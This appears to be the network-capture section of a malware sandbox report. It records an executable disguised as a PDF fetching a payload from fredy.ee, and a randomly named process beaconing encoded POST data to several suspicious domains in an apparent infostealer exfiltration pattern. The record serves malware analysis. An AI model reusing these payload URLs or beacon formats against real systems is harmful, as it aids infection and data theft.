                                                                                                                                              Oct 4, 2024 08:12:01.158312082 CEST4980480192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:12:02.510467052 CEST4980480192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:12:03.527823925 CEST4980580192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:12:03.681307077 CEST804980554.67.87.110192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:03.681521893 CEST4980580192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:12:03.689009905 CEST4980580192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:12:03.842689991 CEST804980554.67.87.110192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:03.843426943 CEST804980554.67.87.110192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:03.843436956 CEST804980554.67.87.110192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:03.843559980 CEST4980580192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:12:05.197405100 CEST4980580192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:12:06.214737892 CEST4980680192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:12:06.368134022 CEST804980654.67.87.110192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:06.368371964 CEST4980680192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:12:06.376060009 CEST4980680192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:12:06.376108885 CEST4980680192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:12:06.376157999 CEST4980680192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:12:06.529606104 CEST804980654.67.87.110192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:06.529735088 CEST804980654.67.87.110192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:06.530628920 CEST804980654.67.87.110192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:06.530733109 CEST804980654.67.87.110192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:06.530850887 CEST4980680192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:12:07.884315968 CEST4980680192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:12:08.901731968 CEST4980780192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:12:09.055936098 CEST804980754.67.87.110192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:09.056077957 CEST4980780192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:12:09.061167955 CEST4980780192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:12:09.216344118 CEST804980754.67.87.110192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:09.216747999 CEST804980754.67.87.110192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:09.216846943 CEST804980754.67.87.110192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:09.217163086 CEST4980780192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:12:09.219048977 CEST4980780192.168.11.2054.67.87.110
                                                                                                                                              Oct 4, 2024 08:12:09.372474909 CEST804980754.67.87.110192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:14.228997946 CEST4980880192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:12:14.464935064 CEST8049808194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:14.465214014 CEST4980880192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:12:14.472788095 CEST4980880192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:12:14.709829092 CEST8049808194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:14.709954023 CEST8049808194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:12:14.709995985 CEST8049808194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:13:00.993711948 CEST8049822162.213.249.216192.168.11.20
                                                                                                                                              Oct 4, 2024 08:13:00.993932009 CEST4982280192.168.11.20162.213.249.216
                                                                                                                                              Oct 4, 2024 08:13:02.310061932 CEST4982280192.168.11.20162.213.249.216
                                                                                                                                              Oct 4, 2024 08:13:03.327112913 CEST4982380192.168.11.20162.213.249.216
                                                                                                                                              Oct 4, 2024 08:13:03.485111952 CEST8049823162.213.249.216192.168.11.20
                                                                                                                                              Oct 4, 2024 08:13:03.485276937 CEST4982380192.168.11.20162.213.249.216
                                                                                                                                              Oct 4, 2024 08:13:03.490326881 CEST4982380192.168.11.20162.213.249.216
                                                                                                                                              Oct 4, 2024 08:13:03.647815943 CEST8049823162.213.249.216192.168.11.20
                                                                                                                                              Oct 4, 2024 08:13:03.685246944 CEST8049823162.213.249.216192.168.11.20
                                                                                                                                              Oct 4, 2024 08:13:03.685260057 CEST8049823162.213.249.216192.168.11.20
                                                                                                                                              Oct 4, 2024 08:13:03.685558081 CEST4982380192.168.11.20162.213.249.216
                                                                                                                                              Oct 4, 2024 08:13:03.687469006 CEST4982380192.168.11.20162.213.249.216
                                                                                                                                              Oct 4, 2024 08:13:03.844993114 CEST8049823162.213.249.216192.168.11.20
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              0192.168.11.2049727185.86.211.136802236C:\Users\user\Desktop\-pdf.bat.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:06:04.521403074 CEST160OUTGET /tur.bin HTTP/1.1
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                                              Host: fredy.ee
                                                                                                                                              Cache-Control: no-cache
Oct 4, 2024 08:06:04.714046955 CEST | 421 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                              Date: Fri, 04 Oct 2024 06:06:04 GMT
                                                                                                                                              Server: Apache
                                                                                                                                              Location: https://fredy.ee/tur.bin
                                                                                                                                              Content-Length: 232
                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://fredy.ee/tur.bin">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.11.20 | 49731 | 13.248.169.48 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:07:03.920676947 CEST | 548 | OUT | GET /tcs6/?oz=UTr2VQMVaNknAPhv8pO5HUt/aSD/OuAvYfufonxWcuzqKYzjt00ESHNOp8OZd4NYpPhYAhKEfFByAl9/w+FcumGXOFp58MMDhVPqk9564kxN8Oc8kW08N+s=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.invicta.world
                                                                                                                                              Connection: close
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Oct 4, 2024 08:07:04.025481939 CEST | 399 | IN | HTTP/1.1 200 OK
                                                                                                                                              Server: openresty
                                                                                                                                              Date: Fri, 04 Oct 2024 06:07:03 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Content-Length: 259
                                                                                                                                              Connection: close
                                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?oz=UTr2VQMVaNknAPhv8pO5HUt/aSD/OuAvYfufonxWcuzqKYzjt00ESHNOp8OZd4NYpPhYAhKEfFByAl9/w+FcumGXOFp58MMDhVPqk9564kxN8Oc8kW08N+s=&UJ9=qN-llTKPHxntPrv0"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.11.20 | 49732 | 3.33.130.190 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:07:19.362390041 CEST | 831 | OUT | POST /bqye/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.whats-in-the-box.org
                                                                                                                                              Origin: http://www.whats-in-the-box.org
                                                                                                                                              Referer: http://www.whats-in-the-box.org/bqye/
                                                                                                                                              Content-Length: 199
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Ascii: oz=lpp2G9wZJQS0MlGRsWnVtSTc2OoujJdPs8tz4LUGUp85oIUzzJPc9UtE5b8lPuD8o17QtYlE++WjwKPRiUfEquo18cEgU1V92kXxu1GTOWl92J6L1PWTNuBYn7CF/mK+e7ODitQZRyrUbupATCvQUVXxOygiWWoaTh4LlwSjp5OZPEzFJ4IImrhpwJOfHYP0cw==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.11.20 | 49733 | 3.33.130.190 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:07:21.996279955 CEST | 851 | OUT | POST /bqye/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.whats-in-the-box.org
                                                                                                                                              Origin: http://www.whats-in-the-box.org
                                                                                                                                              Referer: http://www.whats-in-the-box.org/bqye/
                                                                                                                                              Content-Length: 219
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Ascii: oz=lpp2G9wZJQS0NGeRp1fVryTfzOouqpdLs8hz4KRDU7I5mNozyIPcx0tE378gLuDno1mvtYJE++CjwL/RllfDr+or08EibVV92kXxuxr+OW992ZmL1uWUT+BbzrCFu2L3e7OlioI/RwjUbsxASTvTBlX3Kyg1ZX1UfFN6lDvwjM2tDyifUK8sl49b0533FaOvB+LibGAb0RRM2eQXUgNkMv4=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.11.20 | 49734 | 3.33.130.190 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:07:24.634145975 CEST | 1289 | OUT | POST /bqye/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.whats-in-the-box.org
                                                                                                                                              Origin: http://www.whats-in-the-box.org
                                                                                                                                              Referer: http://www.whats-in-the-box.org/bqye/
                                                                                                                                              Content-Length: 7367
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Oct 4, 2024 08:07:24.634196043 CEST | 3867 | OUT |
                                                                                                                                              Data Ascii: 97lEy8jFOEa2SUqUJk7k3cc9XbwjUB/zUogMY+QlVZnbo/VUQPryF2Hwii0wN2UI4/dQhmMlFwmnA/ndfFgnz4L+Ddl4aNaAkOoVQ+Cj/LL+Cgz78fUHc9xjzjwrxikx7672XlS6EKj9vLCWAdLVIHgA8Pm9EQimEQ4aFHwzHmrJVEfj8qrVVtJVyHUFx9NCO48hlFec51qBrFBstZwcDaOczsja2su+YSidREVp5ic3Gz4wFSU
Oct 4, 2024 08:07:24.634243965 CEST | 2844 | OUT |
                                                                                                                                              Data Ascii: 7JMP3C6VAokuPiTiBzpWwrCz6V6CKacuuPMf9yVTMZOgitsNMJkT4Z9qeppZLgCclS8HCbUtzY1+NPp48cyuGmE27/Vgnb8yoiJnAtKBUX0XwM2dRun7SlNWgtfp4BSNrECmMulH7ud0it8z99NpMjfBmy5m110rwVp5ddfeeBcIeej0vvHlt3u5/OxdjqMAH0aSgw6mPt7WGbslufEWxKWAGvq2ZWu8wUFajM0ABsJQ+Y/8VSd


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.11.20 | 49735 | 3.33.130.190 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:07:27.273075104 CEST | 555 | OUT | GET /bqye/?UJ9=qN-llTKPHxntPrv0&oz=orBWFM4TMH6bEQWb0mufnyz8+/9zteVW//lS5P1UVpZ6i4UA1urKkBRolapSd+D0qVvV/pdb4OKcqrb8qmiU7f8Sw/VtSC1B9WeqmjWWYlIhrofH/7u6E+o= HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.whats-in-the-box.org
                                                                                                                                              Connection: close
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Oct 4, 2024 08:07:27.376599073 CEST | 399 | IN | HTTP/1.1 200 OK
                                                                                                                                              Server: openresty
                                                                                                                                              Date: Fri, 04 Oct 2024 06:07:27 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Content-Length: 259
                                                                                                                                              Connection: close
                                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?UJ9=qN-llTKPHxntPrv0&oz=orBWFM4TMH6bEQWb0mufnyz8+/9zteVW//lS5P1UVpZ6i4UA1urKkBRolapSd+D0qVvV/pdb4OKcqrb8qmiU7f8Sw/VtSC1B9WeqmjWWYlIhrofH/7u6E+o="}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.11.20 | 49736 | 3.33.130.190 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:07:32.609239101 CEST | 813 | OUT | POST /was5/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.linkwave.cloud
                                                                                                                                              Origin: http://www.linkwave.cloud
                                                                                                                                              Referer: http://www.linkwave.cloud/was5/
                                                                                                                                              Content-Length: 199
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Ascii: oz=/+kHACa6XDHale6Bry12IIzvxbTmkm0+IT0B0godfNrLS1dEwHCt200AWhEvUvDgIVHffEkz4Jds049zEqT3RQSfmx+OIUnvjoatMRb8bA3mYOl3EkQonEQgc7R2Fx+o8CShClkVc/0WaX1knzs09cUljrlNx9XR/SobVE8nDv6sA33P0hIadCiNWSByq8RCUg==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.11.20 | 49737 | 3.33.130.190 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:07:35.240950108 CEST | 833 | OUT | POST /was5/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.linkwave.cloud
                                                                                                                                              Origin: http://www.linkwave.cloud
                                                                                                                                              Referer: http://www.linkwave.cloud/was5/
                                                                                                                                              Content-Length: 219
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Ascii: oz=/+kHACa6XDHak/KBkxt2fYzwobTmuG0iIT4B0hc3f+PLSXFExC2tx00AZBEuL/D3IVCifF0z4N1s05NzHZr0QASBqR+IVEnvjoatMRPGbEbmY9t3EG0nkEQvf7R2Sh+s8CTECgAvc98WaVtkmis7oMUj87kl4Mio1Rcya0MCBc+rBhmVpT8+eR+/Si4ao+QZJg/O39jrgaOB6uHPVD+fF6k=


                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                              8 | 192.168.11.20 | 49738 | 3.33.130.190 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                              Oct 4, 2024 08:07:37.880976915 CEST | 2578 | OUT | POST /was5/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.linkwave.cloud
                                                                                                                                              Origin: http://www.linkwave.cloud
                                                                                                                                              Referer: http://www.linkwave.cloud/was5/
                                                                                                                                              Content-Length: 7367
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Ascii: oz= [TRUNCATED]
                                                                                                                                              Oct 4, 2024 08:07:37.881028891 CEST | 2578 | OUT |
                                                                                                                                              Data Ascii: loc8iAUEVCCSlbsFMTA04p76HkCpjd0QcZlgkvYV48jxW5RsLdY0285indKHS8UPuv4GxTt41uuVF4hDy6ae0fTtm6B5iPVCYUQCgyB6Fiql4KIygFFDdKE1R0a1d9sYRglwbaLIUck00YhTXFMxNIwVZYD8gMcbNrBqSlwBfQLaGl5AjPcvVzn0Ir+XGPo+PQ0lR8GocHeyKDI4a/W3EZx8TZeAW5VGfXhTq3OlVE4NU2mDNVE
                                                                                                                                              Oct 4, 2024 08:07:37.881047964 CEST | 2826 | OUT |
                                                                                                                                              Data Ascii: w+PHZQwZbEErHKTpF2tw0BBTMDYG7L1ZN/NlEQ753pJNCw7twseuUOHzTzJWPyG/lDoUwjX5A7Vo4aX6PNnzm3l7Cn/f8KtFTQ4Knwg1l4TsXOSipjAsgVS3tCVHaeq07CvwLAw9SGkVy85wAxKLfX2UrBD7ZhW+NncaqlSaUxyQs/QytYrUO/gA0Y8gjf0oIoKTnQ3mgmHoiftH9LNJp7ukCcpY6xQ+R5nwnPO6fKzfcD2PfZZ


                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                              9 | 192.168.11.20 | 49739 | 3.33.130.190 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                              Oct 4, 2024 08:07:40.522816896 CEST | 549 | OUT | GET /was5/?oz=y8MnD3CAUjfvlbCaxAVac63GvK68hywkVQck0F03MMraCQdP6i6ahgEcKS99S8jCMAfRd1EgvYBIkI1gFr2JNRymkxf7KUrPibiqIzK4PCKgQN9qHiwVnD0=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.linkwave.cloud
                                                                                                                                              Connection: close
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Oct 4, 2024 08:07:40.629918098 CEST | 399 | IN | HTTP/1.1 200 OK
                                                                                                                                              Server: openresty
                                                                                                                                              Date: Fri, 04 Oct 2024 06:07:40 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Content-Length: 259
                                                                                                                                              Connection: close
                                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?oz=y8MnD3CAUjfvlbCaxAVac63GvK68hywkVQck0F03MMraCQdP6i6ahgEcKS99S8jCMAfRd1EgvYBIkI1gFr2JNRymkxf7KUrPibiqIzK4PCKgQN9qHiwVnD0=&UJ9=qN-llTKPHxntPrv0"}</script></head></html>


                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                              10 | 192.168.11.20 | 49740 | 84.32.84.32 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                              Oct 4, 2024 08:07:45.955713034 CEST | 816 | OUT | POST /7k8f/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.dfmagazine.shop
                                                                                                                                              Origin: http://www.dfmagazine.shop
                                                                                                                                              Referer: http://www.dfmagazine.shop/7k8f/
                                                                                                                                              Content-Length: 199
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Ascii: oz=4z1WU9RqYjadMpuPDBvNvyXl0j97Tu3uZMyE5u6eArwA3Iz/dgm5xv99OYzuFpGw+walanqJAid/pmDC4y4rHCDiAVA2mPsi6XotBm5ce4D1rjs18BpIanJUGpwyUEKvD3FiptJBbqkVyW4K4JbNChVwO6UuUxr694T5l8TR2A2Rpw0Vdo48MBDEf8R5PIeJRw==


                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                              11 | 192.168.11.20 | 49741 | 84.32.84.32 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                              Oct 4, 2024 08:07:48.583812952 CEST | 836 | OUT | POST /7k8f/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.dfmagazine.shop
                                                                                                                                              Origin: http://www.dfmagazine.shop
                                                                                                                                              Referer: http://www.dfmagazine.shop/7k8f/
                                                                                                                                              Content-Length: 219
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Ascii: oz=4z1WU9RqYjadNJ+PPCHNqSXmpT97K+3qZM+E5uTDAdIAwoD/chm50v99JozvBpG/+wetamWJAiJ/pmTC5D4oBSDgP1A0pvsi6XotBnd2e4L1oTc1uwpHZnJbMJwyD0KrD3ENpsUkbv4VyXIK5bzOIhV6EaV5TQyK4M2Mk9KD/lKMsmlPAaMYPSf2bMoRNKfSM6Xv3zTP6LXywSgat2MT7pg=


                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                              12 | 192.168.11.20 | 49742 | 84.32.84.32 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                              Oct 4, 2024 08:07:51.232670069 CEST | 2578 | OUT | POST /7k8f/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.dfmagazine.shop
                                                                                                                                              Origin: http://www.dfmagazine.shop
                                                                                                                                              Referer: http://www.dfmagazine.shop/7k8f/
                                                                                                                                              Content-Length: 7367
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Ascii: oz= [TRUNCATED]
                                                                                                                                              Oct 4, 2024 08:07:51.232721090 CEST | 5407 | OUT |
